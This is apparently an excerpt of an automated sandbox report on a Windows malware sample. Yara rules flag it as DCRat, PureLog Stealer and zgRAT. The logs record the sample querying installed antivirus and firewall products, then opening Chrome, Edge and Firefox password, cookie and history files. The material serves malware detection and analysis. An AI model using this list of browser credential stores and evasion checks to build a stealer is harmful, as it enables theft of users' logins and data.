                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                            Source: C:\Windows\System32\cmd.exeQueries volume information: C:\ VolumeInformation
                            Source: C:\Users\user\Desktop\9XHFe6y4Dj.exeQueries volume information: C:\Users\user\Desktop\9XHFe6y4Dj.exe VolumeInformation
                            Source: C:\Users\user\Desktop\9XHFe6y4Dj.exeQueries volume information: C:\Users\user\Desktop\9XHFe6y4Dj.exe VolumeInformation
                            Source: C:\Windows\CbsTemp\tqeRXJHxPWPPoiNqjJeEYdv.exeQueries volume information: C:\Windows\CbsTemp\tqeRXJHxPWPPoiNqjJeEYdv.exe VolumeInformation
                            Source: C:\Windows\CbsTemp\tqeRXJHxPWPPoiNqjJeEYdv.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
                            Source: C:\Windows\CbsTemp\tqeRXJHxPWPPoiNqjJeEYdv.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation
                            Source: C:\Windows\CbsTemp\tqeRXJHxPWPPoiNqjJeEYdv.exeQueries volume information: C:\Windows\Fonts\arialbd.ttf VolumeInformation
                            Source: C:\Users\user\Desktop\9XHFe6y4Dj.exeQueries volume information: C:\Users\user\Desktop\9XHFe6y4Dj.exe VolumeInformation
                            Source: C:\Users\user\Desktop\9XHFe6y4Dj.exeQueries volume information: C:\Users\user\Desktop\9XHFe6y4Dj.exe VolumeInformation
                            Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
                            Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
                            Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
                            Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
                            Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
                            Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
                            Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
                            Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
                            Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm VolumeInformation
                            Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
                            Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
                            Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformation
                            Source: C:\Windows\CbsTemp\tqeRXJHxPWPPoiNqjJeEYdv.exeQueries volume information: C:\Windows\CbsTemp\tqeRXJHxPWPPoiNqjJeEYdv.exe VolumeInformation
                            Source: C:\Users\user\Desktop\9XHFe6y4Dj.exeQueries volume information: C:\Users\user\Desktop\9XHFe6y4Dj.exe VolumeInformation
                            Source: C:\Windows\CbsTemp\tqeRXJHxPWPPoiNqjJeEYdv.exeQueries volume information: C:\Windows\CbsTemp\tqeRXJHxPWPPoiNqjJeEYdv.exe VolumeInformation
                            Source: C:\Users\user\Desktop\9XHFe6y4Dj.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
                            Source: C:\Windows\CbsTemp\tqeRXJHxPWPPoiNqjJeEYdv.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntivirusProduct
                            Source: C:\Windows\CbsTemp\tqeRXJHxPWPPoiNqjJeEYdv.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM FirewallProduct

                            Stealing of Sensitive Information

                            barindex
                            Yara detected DCRat
                            Source: Yara matchFile source: 00000000.00000002.2374859245.0000000012E9A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: Process Memory Space: 9XHFe6y4Dj.exe PID: 6400, type: MEMORYSTR
                            Source: Yara matchFile source: Process Memory Space: 9XHFe6y4Dj.exe PID: 8812, type: MEMORYSTR
                            Yara detected PureLog Stealer
                            Source: Yara matchFile source: 9XHFe6y4Dj.exe, type: SAMPLE
                            Source: Yara matchFile source: 0.0.9XHFe6y4Dj.exe.680000.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 00000000.00000000.2087739498.0000000000682000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                            Source: Yara matchFile source: C:\Program Files (x86)\Windows Mail\tqeRXJHxPWPPoiNqjJeEYdv.exe, type: DROPPED
                            Yara detected zgRAT
                            Source: Yara matchFile source: 9XHFe6y4Dj.exe, type: SAMPLE
                            Source: Yara matchFile source: 0.0.9XHFe6y4Dj.exe.680000.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: C:\Program Files (x86)\Windows Mail\tqeRXJHxPWPPoiNqjJeEYdv.exe, type: DROPPED
                            Tries to harvest and steal browser information (history, passwords, etc)
                            Source: C:\Windows\CbsTemp\tqeRXJHxPWPPoiNqjJeEYdv.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data-journal
                            Source: C:\Windows\CbsTemp\tqeRXJHxPWPPoiNqjJeEYdv.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History-journal
                            Source: C:\Windows\CbsTemp\tqeRXJHxPWPPoiNqjJeEYdv.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cookies.sqlite-shm
                            Source: C:\Windows\CbsTemp\tqeRXJHxPWPPoiNqjJeEYdv.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For Account-journal
                            Source: C:\Windows\CbsTemp\tqeRXJHxPWPPoiNqjJeEYdv.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History
                            Source: C:\Windows\CbsTemp\tqeRXJHxPWPPoiNqjJeEYdv.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History
                            Source: C:\Windows\CbsTemp\tqeRXJHxPWPPoiNqjJeEYdv.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
                            Source: C:\Windows\CbsTemp\tqeRXJHxPWPPoiNqjJeEYdv.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
                            Source: C:\Windows\CbsTemp\tqeRXJHxPWPPoiNqjJeEYdv.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For Account
                            Source: C:\Windows\CbsTemp\tqeRXJHxPWPPoiNqjJeEYdv.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\places.sqlite-shm
                            Source: C:\Windows\CbsTemp\tqeRXJHxPWPPoiNqjJeEYdv.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies-journal
                            Source: C:\Windows\CbsTemp\tqeRXJHxPWPPoiNqjJeEYdv.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data-journal
                            Source: C:\Windows\CbsTemp\tqeRXJHxPWPPoiNqjJeEYdv.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
                            Source: C:\Windows\CbsTemp\tqeRXJHxPWPPoiNqjJeEYdv.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\places.sqlite-wal
                            Source: C:\Windows\CbsTemp\tqeRXJHxPWPPoiNqjJeEYdv.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cookies.sqlite
                            Source: C:\Windows\CbsTemp\tqeRXJHxPWPPoiNqjJeEYdv.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History-journal
                            Source: C:\Windows\CbsTemp\tqeRXJHxPWPPoiNqjJeEYdv.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension Cookies
                            Source: C:\Windows\CbsTemp\tqeRXJHxPWPPoiNqjJeEYdv.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data-journal
                            Source: C:\Windows\CbsTemp\tqeRXJHxPWPPoiNqjJeEYdv.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\places.sqlite
                            Source: C:\Windows\CbsTemp\tqeRXJHxPWPPoiNqjJeEYdv.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                            Source: C:\Windows\CbsTemp\tqeRXJHxPWPPoiNqjJeEYdv.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
                            Source: C:\Windows\CbsTemp\tqeRXJHxPWPPoiNqjJeEYdv.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension Cookies-journal
